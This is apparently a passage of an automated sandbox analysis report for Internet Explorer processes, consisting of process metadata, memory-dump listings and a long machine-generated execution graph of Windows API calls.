                                                                                                                                                                                                              Reputation:low

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:16:06
                                                                                                                                                                                                              Start date:12/05/2021
                                                                                                                                                                                                              Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:'C:\Program Files\Internet Explorer\iexplore.exe' https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                                                                                                              Imagebase:0x13f850000
                                                                                                                                                                                                              File size:814288 bytes
                                                                                                                                                                                                              MD5 hash:4EB098135821348270F27157F7A84E65
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Start time:15:16:07
                                                                                                                                                                                                              Start date:12/05/2021
                                                                                                                                                                                                              Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2472 CREDAT:275457 /prefetch:2
                                                                                                                                                                                                              Imagebase:0x10d0000
                                                                                                                                                                                                              File size:815304 bytes
                                                                                                                                                                                                              MD5 hash:8A590F790A98F3D77399BE457E01386A
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate

                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                              Code Analysis

                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 01383182
                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 01383191
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0138319A
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 013831A3
                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 013831B8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.3354974293.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.3354945811.0000000001310000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355398174.0000000001389000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355429161.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355477907.0000000001391000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355521890.00000000013A0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355566195.00000000013CD000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355605009.00000000013E3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355628696.00000000013E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355659822.00000000013EE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355683582.0000000001410000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355714521.000000000141A000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355732334.0000000001425000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355747306.0000000001427000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355769205.0000000001452000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355788192.000000000145C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355803451.000000000148B000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355949356.0000000001560000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3355999768.00000000015D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356185609.00000000016FE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356269169.000000000176E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356390995.0000000001846000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356421279.00000000018B4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356532006.00000000019E4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356554980.00000000019F3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356576325.0000000001A5D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356651477.0000000001B29000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356701929.0000000001BA6000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356788022.0000000001BD1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356798153.0000000001BD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356823106.0000000001CC8000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356835634.0000000001CD5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000004.00000002.3356845764.0000000001D07000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_1310000_9697.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                • Opcode ID: a214076dd1bb559a4b37a484ffa0c2dca1fb3397a777a38a4348c83f3c506a24
                                                                                                                                                                                                                • Instruction ID: 7c720f78fdc396924419cae77b8cac0ae3e0a1bc08b2e31411dcfbd76cce4bcf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a214076dd1bb559a4b37a484ffa0c2dca1fb3397a777a38a4348c83f3c506a24
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6611DA71D01208ABCB21EBF8D648AAEBBFAFF48725F554955D402E7248E630DA008B40
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:7.6%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:15.9%
                                                                                                                                                                                                                Total number of Nodes:1542
                                                                                                                                                                                                                Total number of Limit Nodes:39

                                                                                                                                                                                                                Graph

                                                                                                                                                                                                                execution_graph 36599 9a6690 GetWindowLongW 36600 9a66b8 DefWindowProcW 36599->36600 36601 9a66a4 36599->36601 36604 9a75c4 36601->36604 36605 9a75e3 36604->36605 36606 9a7826 36604->36606 36607 9a778a 36605->36607 36608 9a75e9 36605->36608 36609 9a7833 36606->36609 36610 9a7a81 36606->36610 36615 9a784a DefWindowProcW 36607->36615 36616 9a77aa 36607->36616 36617 9a77f2 36607->36617 36611 9a75f2 36608->36611 36612 9a7733 36608->36612 36613 9a79af 36609->36613 36614 9a783c 36609->36614 36624 9a7ab9 PostQuitMessage 36610->36624 36633 9b8a19 183 API calls 36610->36633 36618 9a75fb 36611->36618 36619 9a76f3 36611->36619 36637 9b8a19 183 API calls 36612->36637 36655 9a66b4 36612->36655 36625 9a79e4 ShutdownBlockReasonCreate 36613->36625 36635 9b8a19 183 API calls 36613->36635 36620 9a78f4 36614->36620 36621 9a7845 36614->36621 36615->36655 36647 9b8a19 183 API calls 36616->36647 36616->36655 36617->36615 36638 9b8a19 183 API calls 36617->36638 36622 9a76ae 36618->36622 36623 9a7607 36618->36623 36639 9b8a19 183 API calls 36619->36639 36619->36655 36626 9a7929 ShutdownBlockReasonDestroy 36620->36626 36641 9b8a19 183 API calls 36620->36641 36621->36615 36640 9a785f 36621->36640 36628 9a76e1 36622->36628 36645 9b8a19 183 API calls 36622->36645 36623->36615 36644 9a7613 36623->36644 36624->36655 36627 9a7a31 GetLastError 36625->36627 36636 9a79f4 36625->36636 36630 9a7974 GetLastError 36626->36630 36643 9a7936 36626->36643 36654 9a797e 36627->36654 36660 9b8877 36628->36660 36629 9a7891 36629->36616 36656 9a7690 36629->36656 36630->36654 36631 9a7646 36651 9a7656 36631->36651 36631->36656 36634 9a7ab6 36633->36634 36634->36624 36642 9a79e1 36635->36642 36652 9b8a19 183 API calls 36636->36652 36636->36655 36637->36655 36646 9a781e 36638->36646 36639->36655 36640->36629 36648 9b8a19 183 API calls 36640->36648 36649 9a7926 36641->36649 36642->36625 36653 9b8a19 183 API calls 36643->36653 36643->36655 36644->36631 36650 9b8a19 183 API calls 36644->36650 36645->36628 36646->36615 36647->36655 36648->36629 36649->36626 36650->36631 36651->36655 36659 9b8a19 183 API calls 36651->36659 36652->36655 36653->36655 36654->36655 36657 9b8a19 183 API calls 36654->36657 36656->36655 36658 9b8a19 183 API calls 36656->36658 36657->36655 36658->36655 36659->36655 36673 9b8bee 36660->36673 36665 9b8897 36666 9b9d9c 6 API calls 36665->36666 36668 9b8909 36666->36668 36667 9b88c8 36667->36665 36670 9bccb5 6 API calls 36667->36670 36668->36655 36671 9b88df 36670->36671 36671->36665 36702 9b8bb3 36671->36702 36709 9bb4dc 36673->36709 36675 9b8bf9 36676 9b9d9c 6 API calls 36675->36676 36677 9b8891 36676->36677 36677->36665 36678 9bc640 36677->36678 36731 9bd0b5 GetCurrentProcess IsWow64Process 36678->36731 36681 9bc676 RegQueryValueExW 36682 9bc66d 36681->36682 36683 9b9d9c 6 API calls 36682->36683 36684 9bc6bc 36683->36684 36685 9b88ab 36684->36685 36686 9bc6c2 RegCloseKey 36684->36686 36685->36665 36685->36667 36687 9bb3ee 36685->36687 36686->36685 36688 9bd0b5 11 API calls 36687->36688 36690 9bb40e 36688->36690 36689 9bb420 RegQueryValueExW 36689->36690 36690->36689 36693 9bb472 36690->36693 36696 9bb44d GetProcessHeap HeapAlloc 36690->36696 36701 9bb46b 36690->36701 36691 9b9d9c 6 API calls 36692 9bb4b1 36691->36692 36694 9bb4c5 36692->36694 36695 9bb4b5 GetProcessHeap HeapFree 36692->36695 36693->36701 36740 9a1c3f 6 API calls 36693->36740 36697 9bb4cb RegCloseKey 36694->36697 36698 9bb4d4 36694->36698 36695->36694 36696->36689 36699 9bb464 36696->36699 36697->36698 36698->36667 36699->36701 36701->36691 36703 9b9d9c 6 API calls 36702->36703 36704 9b8bc3 36703->36704 36741 9bb369 36704->36741 36706 9b8bd2 36707 9b9d9c 6 API calls 36706->36707 36708 9b8be6 36707->36708 36708->36665 36720 9bd21f 36709->36720 36712 9bb50c 36714 9b9d9c 6 API calls 36712->36714 36713 9bb52f RegSetKeySecurity 36713->36712 36715 9bb55e 36714->36715 36716 9bb56d 36715->36716 36717 9bb564 LocalFree 36715->36717 36718 9bb57c 36716->36718 36719 9bb573 RegCloseKey 36716->36719 36717->36716 36718->36675 36719->36718 36721 9bd25a GetCurrentProcess IsWow64Process 36720->36721 36722 9bd24a 36720->36722 36723 9bd26f GetLastError 36721->36723 36724 9bd287 RegCreateKeyExW 36721->36724 36722->36721 36725 9bd27c 36723->36725 36724->36725 36727 9b9d9c 6 API calls 36725->36727 36728 9bd2d8 36727->36728 36729 9bd2de RegCloseKey 36728->36729 36730 9bb503 36728->36730 36729->36730 36730->36712 36730->36713 36732 9bd0f9 RegOpenKeyExW 36731->36732 36733 9bd0e1 GetLastError 36731->36733 36735 9bd0ee 36732->36735 36733->36735 36736 9b9d9c 6 API calls 36735->36736 36737 9bd137 36736->36737 36738 9bd13c RegCloseKey 36737->36738 36739 9bc664 36737->36739 36738->36739 36739->36681 36739->36682 36740->36701 36742 9bd0b5 11 API calls 36741->36742 36743 9bb38b 36742->36743 36744 9bb3bb 36743->36744 36745 9b9d9c 6 API calls 36743->36745 36747 9b9d9c 6 API calls 36744->36747 36746 9bb398 RegSetValueExW 36745->36746 36746->36744 36748 9bb3d0 36747->36748 36749 9aee5d 2 API calls 36748->36749 36750 9bb3d8 36749->36750 36751 9bb3dd RegCloseKey 36750->36751 36752 9bb3e6 36750->36752 36751->36752 36752->36706 36156 a07280 36157 a07290 36156->36157 36159 a072a2 36156->36159 36162 a073aa 36157->36162 36163 a073bb 36162->36163 36164 a073cc 36163->36164 36187 a07311 11 API calls 36163->36187 36165 a073d0 memset 36164->36165 36166 a07297 36164->36166 36165->36166 36168 a07803 36166->36168 36188 a0f2f8 36168->36188 36170 a0780f _wfopen 36171 a07a07 36170->36171 36172 a07848 GetProcessHeap HeapAlloc 36170->36172 36190 a07a30 19 API calls 36171->36190 36181 a0786d 36172->36181 36174 a07a13 36174->36159 36175 a07876 fgetws 36176 a07a00 36175->36176 36175->36181 36176->36171 36177 a078b2 GetProcessHeap HeapReAlloc 36177->36171 36178 a078d9 fgetws 36177->36178 36179 a07903 feof 36178->36179 36178->36181 36179->36171 36179->36181 36180 a0793a iswctype 36180->36181 36181->36171 36181->36175 36181->36177 36181->36180 36182 a079cc swscanf_s 36181->36182 36183 a07966 GetProcessHeap HeapFree 36181->36183 36185 a07988 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 36181->36185 36186 a07979 GetProcessHeap HeapFree 36181->36186 36189 a075ab 41 API calls 36181->36189 36182->36171 36182->36181 36183->36181 36185->36171 36185->36181 36186->36185 36187->36163 36188->36170 36189->36181 36190->36174 36867 a05a90 36868 a05ab3 36867->36868 36871 a05b3b 36867->36871 36868->36871 36873 a02b70 36868->36873 36869 a0ea60 4 API calls 36870 a05b52 36869->36870 36871->36869 36878 a05274 36873->36878 36876 a02b90 36876->36871 36877 a05274 6 API calls 36877->36876 36879 a052b0 36878->36879 36881 a05283 GetProcessHeap RtlAllocateHeap 36878->36881 36882 a052b8 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 36879->36882 36883 a02b83 36879->36883 36881->36883 36884 a052df 36882->36884 36883->36876 36883->36877 36884->36883 36266 9b8cd1 36267 9b8cef 36266->36267 36282 9b8ebc 36267->36282 36283 9b9d9c 36267->36283 36268 9b9d9c 6 API calls 36269 9b8ecc 36268->36269 36271 a0ea60 4 API calls 36269->36271 36272 9b8edb 36271->36272 36273 9b8ee6 36291 a0ec64 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36273->36291 36274 9b8dab wcschr 36277 9b8d5a 36274->36277 36276 9b8eeb 36277->36273 36277->36274 36278 9b8e41 GetFileAttributesW 36277->36278 36279 9b8e57 CreateDirectoryW 36277->36279 36277->36282 36278->36277 36278->36279 36280 9b8e6a GetFileAttributesW 36279->36280 36281 9b8eaf GetLastError 36279->36281 36280->36277 36280->36281 36281->36282 36282->36268 36285 9b9dc8 36283->36285 36284 9b9e3d 36286 a0ea60 4 API calls 36284->36286 36285->36284 36288 9b9e13 EtwEventEnabled 36285->36288 36287 9b9e49 36286->36287 36287->36277 36288->36284 36289 9b9e19 EtwEventWrite 36288->36289 36289->36284 36291->36276 36885 9a7aca 36890 9a7ae7 36885->36890 36893 9a7b0e 36885->36893 36886 9b8ab5 183 API calls 36898 9a7b09 36886->36898 36887 9a7b3d NtPowerInformation 36899 9b9ca1 36887->36899 36889 9a7b5c 36889->36890 36896 9a7b85 36889->36896 36890->36886 36891 9b9d9c 6 API calls 36892 9a7bdc 36891->36892 36893->36887 36894 9b8a19 183 API calls 36893->36894 36895 9a7b3a 36894->36895 36895->36887 36897 9b8a19 183 API calls 36896->36897 36896->36898 36897->36898 36898->36891 36900 9b9cbb 36899->36900 36905 9b9cee 36899->36905 36901 9b9ccc GetModuleHandleExW 36900->36901 36900->36905 36902 9b9ce1 GetLastError 36901->36902 36903 9b9cf4 GetProcAddress 36901->36903 36902->36905 36903->36902 36904 9b9d08 36903->36904 36904->36905 36905->36889 37102 9ad2e0 37103 9ad2f1 37102->37103 37104 9b8ab5 183 API calls 37103->37104 37105 9ad3aa 37103->37105 37104->37105 37106 9b9d9c 6 API calls 37105->37106 37107 9ad3b1 37106->37107 36753 9a9210 36755 9a922a 36753->36755 36754 9a9250 36756 9a92a9 36754->36756 36758 9a9259 36754->36758 36755->36754 36759 9b8a19 183 API calls 36755->36759 36768 9fe9a2 36756->36768 36783 9b8ab5 36758->36783 36759->36754 36761 9b9d9c 6 API calls 36762 9a93d4 36761->36762 36764 9a9282 36764->36761 36765 9a92fe 36765->36764 36767 9b8a19 183 API calls 36765->36767 36766 9b8a19 183 API calls 36766->36765 36767->36764 36769 9bb3ee 17 API calls 36768->36769 36770 9fe9d2 36769->36770 36771 9fea38 36770->36771 36772 9fe9df 36770->36772 36774 9b9d9c 6 API calls 36771->36774 36789 9fea52 13 API calls __EH_prolog3 36772->36789 36777 9a92b4 36774->36777 36775 9fe9ec 36775->36771 36776 9fe9e6 36776->36775 36778 9bb3ee 17 API calls 36776->36778 36777->36765 36777->36766 36779 9fea0b 36778->36779 36779->36771 36780 9b8bb3 15 API calls 36779->36780 36781 9fea1e 36780->36781 36781->36775 36790 9fea52 13 API calls __EH_prolog3 36781->36790 36784 9b8ac2 36783->36784 36788 9b8ada 36783->36788 36786 9b8a19 183 API calls 36784->36786 36784->36788 36785 9b9d9c 6 API calls 36787 9b8af1 36785->36787 36786->36788 36787->36764 36788->36785 36789->36776 36790->36775 36906 9ff60e 36965 a101e0 36906->36965 36911 9ffbbf 36913 a0ea60 4 API calls 36911->36913 36915 9ffc0f 36913->36915 36917 9ff76d GetLastError 36918 9ff778 36917->36918 36918->36911 36919 9ff7d3 36918->36919 37001 a01dd1 6 API calls 36918->37001 36919->36911 36921 9ff808 GetWindowsDirectoryA 36919->36921 37026 9fecc6 _vsnprintf 36919->37026 36924 9ff81e 36921->36924 36922 9ffba3 37002 a045c1 36922->37002 36927 9be595 _vsnwprintf 36924->36927 36926 9ff801 36926->36921 36926->36924 36928 9ffa43 36927->36928 36929 9be595 _vsnwprintf 36928->36929 36959 a0007d 36928->36959 36931 9ffa70 36929->36931 36932 9be595 _vsnwprintf 36931->36932 36931->36959 36933 9ffa9d 36932->36933 36934 9be595 _vsnwprintf 36933->36934 36933->36959 36935 9ffaca 36934->36935 36936 9be595 _vsnwprintf 36935->36936 36935->36959 36937 9ffaf7 36936->36937 36938 9be595 _vsnwprintf 36937->36938 36937->36959 36939 9ffb24 36938->36939 36940 9be595 _vsnwprintf 36939->36940 36939->36959 36943 9ffb51 36940->36943 36941 9ffc74 36942 9ffca7 36941->36942 36945 9ffc91 SetUnhandledExceptionFilter 36941->36945 37014 9ff5a0 36942->37014 36943->36941 36944 9be595 _vsnwprintf 36943->36944 36948 9ffb91 36943->36948 36943->36959 36944->36948 36945->36942 36947 9ffc18 ExpandEnvironmentStringsW 36949 9ffc29 GetFileAttributesW 36947->36949 36950 9ffc46 GetTempPathW 36947->36950 36948->36941 36948->36947 36949->36950 36951 9ffc34 36949->36951 36950->36941 36952 9ffc52 wcsrchr 36950->36952 36951->36941 36951->36950 36952->36941 36953 9ffcac 36955 9fff81 GetCurrentProcessId 36953->36955 36957 9fffac 36953->36957 36953->36959 36955->36957 36956 a00044 36958 a00071 RtlAddVectoredExceptionHandler 36956->36958 36956->36959 36957->36956 36960 9ffffe GetLastError 36957->36960 36958->36959 37020 a000cc 36959->37020 36961 9a1d02 23 API calls 36960->36961 36962 a00037 36961->36962 36963 a0086c 137 API calls 36962->36963 36963->36956 36966 9ff632 8 API calls 36965->36966 36967 a0290c 36966->36967 36968 a0292e 36967->36968 36977 a02ae3 36967->36977 36970 a02965 36968->36970 36971 a02949 GetVersion 36968->36971 36969 a0ea60 4 API calls 36972 9ff72e 36969->36972 36973 a029e4 36970->36973 36974 a02978 GetModuleHandleW 36970->36974 36971->36970 36972->36911 36982 9fed7d 36972->36982 36975 a02a2a memset ExpandEnvironmentStringsW 36973->36975 36974->36975 36976 a029cd GetProcAddress 36974->36976 36975->36977 36978 a02aaa LoadLibraryExW 36975->36978 36976->36975 36979 a029dd 36976->36979 36977->36969 36980 a02ad0 GetProcAddress 36978->36980 36981 a02abd FreeLibrary 36978->36981 36979->36975 36980->36977 36981->36977 37027 9c1150 AllocateAndInitializeSid 36982->37027 36985 9fedac AllocateAndInitializeSid 36986 9feda7 36985->36986 36987 9fedc9 CheckTokenMembership 36985->36987 36990 a0ea60 4 API calls 36986->36990 36988 9fedde 36987->36988 36989 9fede1 FreeSid 36987->36989 36988->36989 36989->36986 36991 9fedf7 36990->36991 36992 a027a0 36991->36992 36993 a01f8c 35 API calls 36992->36993 36994 a027b4 CreateMutexW 36993->36994 36996 a027ee 36994->36996 36997 a027df 36994->36997 36998 a02266 3 API calls 36996->36998 36997->36996 36999 a027e5 WaitForSingleObject 36997->36999 37000 9ff761 36998->37000 36999->36996 37000->36917 37000->36918 37001->36922 37003 a0290c 12 API calls 37002->37003 37004 a045ce 37003->37004 37005 a045d2 GetProcessHeap HeapAlloc 37004->37005 37012 a0460b 37004->37012 37006 a045e8 37005->37006 37007 a045f1 37005->37007 37049 a02d3b 11 API calls __EH_prolog3 37006->37049 37007->37012 37036 a02f1b 37007->37036 37010 a045ef 37010->37007 37012->36919 37015 9ff5ac 37014->37015 37016 9ff5cd 37015->37016 37017 9ff5bd TlsAlloc 37015->37017 37018 9ff5d6 TlsAlloc 37016->37018 37019 9ff5e6 37016->37019 37017->37016 37017->37019 37018->37019 37019->36953 37021 a000d5 37020->37021 37023 a000e4 37020->37023 37021->37023 37091 a00307 63 API calls 37021->37091 37088 a022c0 CloseHandle 37023->37088 37026->36926 37028 9c1195 CheckTokenMembership 37027->37028 37029 9c11c2 GetLastError 37027->37029 37030 9c11af GetLastError 37028->37030 37031 9c11aa 37028->37031 37032 9c11ca SetLastError 37029->37032 37033 9c11b7 FreeSid 37030->37033 37031->37033 37034 a0ea60 4 API calls 37032->37034 37033->37032 37035 9c11df 37034->37035 37035->36985 37035->36986 37038 a02f27 37036->37038 37037 a03058 37037->37012 37050 a04616 22 API calls 37037->37050 37038->37037 37048 a027a0 40 API calls 37038->37048 37039 a02f53 37039->37037 37051 a02e53 37039->37051 37041 a02f70 37043 a02f89 GetProcessHeap RtlAllocateHeap 37041->37043 37047 a03042 37041->37047 37044 a02fa8 memset 37043->37044 37043->37047 37045 a02fc4 37044->37045 37045->37047 37061 a02c34 37045->37061 37068 a03062 14 API calls 37047->37068 37048->37039 37049->37010 37050->37012 37052 a02e5f __EH_prolog3 37051->37052 37053 a05274 6 API calls 37052->37053 37057 a02e97 37053->37057 37054 a02f06 37075 a01710 37054->37075 37056 a02f11 37056->37041 37057->37054 37069 a051d5 37057->37069 37059 a02ec3 37059->37054 37060 a02ed3 memset 37059->37060 37060->37054 37062 a02c40 __EH_prolog3 37061->37062 37063 a02c59 GetProcessHeap HeapAlloc 37062->37063 37065 a02ce5 37062->37065 37087 a02cf4 GetProcessHeap HeapFree __EH_prolog3 37062->37087 37067 a02c8e 37063->37067 37065->37047 37066 a05274 6 API calls 37066->37067 37067->37065 37067->37066 37068->37037 37070 a051e3 37069->37070 37078 a02800 37070->37078 37072 a05204 37072->37059 37076 a01715 GetProcessHeap HeapFree 37075->37076 37077 a01726 37075->37077 37076->37077 37077->37056 37079 a01f8c 35 API calls 37078->37079 37080 a02815 CreateFileMappingW 37079->37080 37082 a02266 3 API calls 37080->37082 37083 a0284d 37082->37083 37084 a02851 37083->37084 37085 a0285c GetLastError 37083->37085 37084->37072 37086 a022e0 MapViewOfFile 37084->37086 37085->37084 37086->37072 37087->37063 37089 a022d2 DebugBreak 37088->37089 37090 a0010c 37088->37090 37089->37090 37090->36911 37091->37023 36791 9a6650 36792 9a665d 36791->36792 36793 9a6664 36791->36793 36795 9b9d9c 6 API calls 36792->36795 36796 9a6676 36792->36796 36799 9a695a 36793->36799 36795->36796 36797 9b9d9c 6 API calls 36796->36797 36798 9a667d 36797->36798 36800 9a6980 36799->36800 36806 9a6971 36799->36806 36815 9a7be5 36800->36815 36802 9a6985 SetEvent 36803 9a69b0 36802->36803 36804 9a6995 GetLastError 36802->36804 36805 9a69d4 GetMessageW 36803->36805 36803->36806 36804->36806 36807 9a69be TranslateMessage DispatchMessageW 36805->36807 36808 9a69e6 DestroyWindow 36805->36808 36811 9b8ab5 183 API calls 36806->36811 36807->36805 36809 9a69f3 GetLastError 36808->36809 36810 9a6a26 36808->36810 36813 9a6a00 36809->36813 36812 9b9d9c 6 API calls 36810->36812 36811->36810 36814 9a6a2d 36812->36814 36813->36806 36814->36792 36816 9a7bf1 __EH_prolog3 36815->36816 36817 9b9c14 11 API calls 36816->36817 36818 9a7c08 36817->36818 36819 9a7c41 LoadImageW 36818->36819 36822 9a7c15 36818->36822 36820 9a7c7a LoadCursorW RegisterClassW 36819->36820 36821 9a7c5e GetLastError 36819->36821 36823 9a7d37 36820->36823 36824 9a7cc4 GetLastError 36820->36824 36821->36822 36827 9b8ab5 183 API calls 36822->36827 36828 9a7d6d CreateWindowExW 36823->36828 36846 9b8a19 183 API calls 36823->36846 36824->36823 36825 9a7cd1 GetLastError 36824->36825 36826 9a7ce1 36825->36826 36826->36823 36836 9a7ce5 36826->36836 36845 9a7c3c 36827->36845 36829 9a7d8f GetLastError 36828->36829 36830 9a7da6 ChangeWindowMessageFilterEx 36828->36830 36835 9a7d9c 36829->36835 36831 9a7dba GetLastError 36830->36831 36832 9a7dd1 SetTimer 36830->36832 36837 9a7dc7 36831->36837 36838 9a7de8 GetLastError 36832->36838 36839 9a7df5 36832->36839 36833 9a7d1d 36841 9b9d9c 6 API calls 36833->36841 36834 9a7d16 36865 9a7e94 187 API calls __EH_prolog3 36834->36865 36835->36830 36842 9b8ab5 183 API calls 36836->36842 36837->36832 36838->36839 36856 9b8822 36839->36856 36843 9a7d24 36841->36843 36842->36845 36847 9a7d2f 36843->36847 36866 9b9b21 8 API calls 36843->36866 36845->36833 36845->36834 36850 9a7d6a 36846->36850 36847->36802 36850->36828 36852 9a7e2e GetLastError 36854 9a7e3b 36852->36854 36853 9a7e45 ShowWindow SetWindowLongW GetWindowLongW 36853->36845 36855 9a7e6d 36853->36855 36854->36853 36857 9b8bee 14 API calls 36856->36857 36858 9b8832 36857->36858 36859 9bc640 13 API calls 36858->36859 36864 9b885d 36858->36864 36860 9b8843 36859->36860 36863 9b8bb3 15 API calls 36860->36863 36860->36864 36861 9b9d9c 6 API calls 36862 9a7e09 UpdateWindow 36861->36862 36862->36852 36862->36853 36863->36864 36864->36861 36865->36833 36866->36847 37092 9ad580 37093 9ad5db 37092->37093 37094 9ad596 37092->37094 37095 9b9d9c 6 API calls 37093->37095 37094->37093 37097 9b8ab5 183 API calls 37094->37097 37096 9ad5e3 37095->37096 37097->37093 36206 9be3be 36207 9be478 SetLastError 36206->36207 36208 9be3d8 36206->36208 36209 9be480 36207->36209 36208->36207 36210 9be3e3 36208->36210 36220 9be5fc 36210->36220 36213 9be3f4 CreateFileW 36214 9be412 DeviceIoControl 36213->36214 36215 9be454 GetLastError 36213->36215 36217 9be43a GetLastError 36214->36217 36218 9be444 36214->36218 36216 9be45c GetProcessHeap HeapFree SetLastError 36215->36216 36216->36209 36219 9be44b CloseHandle 36217->36219 36218->36219 36219->36216 36221 9be63f 36220->36221 36222 9be802 SetLastError 36220->36222 36221->36222 36224 9be64a 36221->36224 36223 9be80c 36222->36223 36255 a0ea60 36223->36255 36260 9bea79 7 API calls 36224->36260 36227 9be3ea 36227->36209 36227->36213 36229 9be657 36230 9be660 GetLastError 36229->36230 36232 9be682 36229->36232 36231 9be66a 36230->36231 36231->36232 36233 9be676 GetLastError 36231->36233 36234 9be716 36232->36234 36235 9be6bc _wcsnicmp 36232->36235 36250 9be7b7 36232->36250 36233->36232 36234->36250 36264 9bf6d6 GetPEB HeapAlloc GetPEB RtlFreeHeap 36234->36264 36235->36234 36236 9be6d4 _wcsnicmp 36235->36236 36236->36234 36239 9be6e8 36236->36239 36238 9be763 36240 9be769 GetLastError 36238->36240 36248 9be78b 36238->36248 36261 9bee2e 7 API calls 36239->36261 36244 9be773 36240->36244 36241 9be7f4 SetLastError 36241->36223 36242 9be7e4 GetProcessHeap HeapFree 36242->36241 36247 9be77f GetLastError 36244->36247 36244->36248 36245 9be7a3 _wcsnicmp 36249 9be7bc _wcsnicmp 36245->36249 36245->36250 36246 9be6f7 36246->36250 36251 9be70b 36246->36251 36252 9be72e 36246->36252 36247->36248 36248->36245 36248->36250 36249->36250 36250->36241 36250->36242 36262 9be9ac 6 API calls 36251->36262 36263 9be9ac 6 API calls 36252->36263 36256 a0ea68 36255->36256 36257 a0ea6b 36255->36257 36256->36227 36265 a0eb2c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 36257->36265 36259 a0ec62 36259->36227 36260->36229 36261->36246 36262->36234 36263->36234 36264->36238 36265->36259 37098 9a35c0 37099 9a35dc 37098->37099 37101 9a34a0 183 API calls 37099->37101 37100 9a35e0 37101->37100 36074 a061c0 36075 a06223 36074->36075 36076 a061d4 36074->36076 